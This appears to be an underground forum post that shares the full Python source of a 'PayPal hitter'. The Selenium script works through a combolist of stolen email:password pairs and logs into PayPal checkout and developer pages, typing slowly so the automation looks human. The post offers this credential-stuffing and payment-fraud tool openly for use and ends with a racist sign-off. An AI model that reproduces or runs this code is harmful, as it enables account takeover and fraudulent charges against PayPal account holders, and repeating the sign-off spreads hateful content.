An Autohitter is a tool that automates the process of hitting pp,ccs and other shit.
Here is the source code of a pp hitter:
Show ContentSpoiler:
import os
import sys
import time
from colorama import Fore
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
# Redirect error messages to os.devnull
sys.stderr = open(os.devnull, 'w')
def clear_console():
# Clear console command for different operating systems
if os.name == 'nt': # For Windows
os.system('cls')
else: # For Unix-like systems (Linux, macOS, etc.)
os.system('clear')
def print_banner():
clear_console()
print(Fore.MAGENTA + """
____ _____ _ _ _ _
| _ \ / ____| | (_) | | |
| |_) | ___ __ _ _ __ _ _| (___ | |__ _| |_| |_ ___ _ __
| _ < / _ \/ _` | '_ \| '__\___ \| '_ \| | __| __/ _ \ '__|
| |_) | __/ (_| | | | | | ____) | | | | | |_| || __/ |
|____/ \___|\__,_|_| |_|_| |_____/|_| |_|_|\__|\__\___|_|
""")
def paypal_login(combolist_file, checkout_url):
clear_console()
print_banner()
with open(combolist_file, "r") as combolist_file:
combolist = combolist_file.readlines()
for combo in combolist:
seq = combo.strip()
acc = seq.split(":")
username = acc[0]
password = acc[1]
options = Options()
options.add_argument("--ignore-certificate-errors")
# Disable logging for WebDriver
options.add_argument("--log-level=3")
driver = webdriver.Chrome(options=options)
driver.get(checkout_url)
driver.implicitly_wait(10)
Paypalid = driver.find_element(By.ID, "email")
for letter in username:
Paypalid.send_keys(letter)
time.sleep(0.3)
Paypalid.send_keys(Keys.RETURN)
time.sleep(3)
def click_login_with_password():
try:
login_with_password = driver.find_element(By.LINK_TEXT, "Log in with a password instead")
login_with_password.click()
time.sleep(2)
except NoSuchElementException:
pass
click_login_with_password()
password_input = driver.find_element(By.ID, "password")
password_input.clear()
for letter in password:
password_input.send_keys(letter)
time.sleep(0.3)
password_input.send_keys(Keys.RETURN)
os.system('pause')
driver.quit()
def paypal_developer_login(combolist_file):
clear_console()
print_banner()
with open(combolist_file, "r") as combolist_file:
combolist = combolist_file.readlines()
for combo in combolist:
seq = combo.strip()
acc = seq.split(":")
username = acc[0]
password = acc[1]
options = Options()
options.add_argument("--ignore-certificate-errors")
# Disable logging for WebDriver
options.add_argument("--log-level=3")
driver = webdriver.Chrome(options=options)
driver.get("https://www.paypal.com/signin")
devemailsaa = driver.find_element(By.ID, "email")
for letter in username:
devemailsaa.send_keys(letter)
time.sleep(0.3)
driver.implicitly_wait(20)
driver.get("https://www.paypal.com/signin?returnUri=https://developer.paypal.com/developer/applications")
driver.implicitly_wait(20)
devemailsa = driver.find_element(By.ID, "email")
for letter in username:
devemailsa.send_keys(letter)
time.sleep(0.3)
btnextdev = driver.find_element(By.ID, "btnNext")
btnextdev.send_keys(Keys.RETURN)
driver.implicitly_wait(20)
password_input = driver.find_element(By.ID, "password")
password_input.clear()
for letter in "ShiniGami":
password_input.send_keys(letter)
time.sleep(0.3)
driver.find_element(By.ID, "btnLogin").click()
driver.implicitly_wait(13)
password_input = driver.find_element(By.ID, "password")
password_input.clear()
for letter in password:
password_input.send_keys(letter)
time.sleep(0.3)
driver.find_element(By.ID, "btnLogin").click()
os.system('pause')
driver.quit()
def main():
print_banner()
print(Fore.MAGENTA + "[" + Fore.RESET + "1" + Fore.MAGENTA + "]" + Fore.MAGENTA + " Paypal Hitter [Hits Checkouts]")
print(Fore.MAGENTA + "[" + Fore.RESET + "2" + Fore.MAGENTA + "]" + Fore.MAGENTA + " Paypal Login [Developer Login Method] ")
inputv1 = input("[@Beanrr] Select Module: ")
if inputv1 == "1":
combolist_file = input("Enter Combo: ")
checkout_url = input("Enter Url: ")
paypal_login(combolist_file, checkout_url)
if inputv1 == "2":
combolist_file = input("Enter Combo: ")
paypal_developer_login(combolist_file)
print()
if __name__ == '__main__':
main()
Cum UG, stay White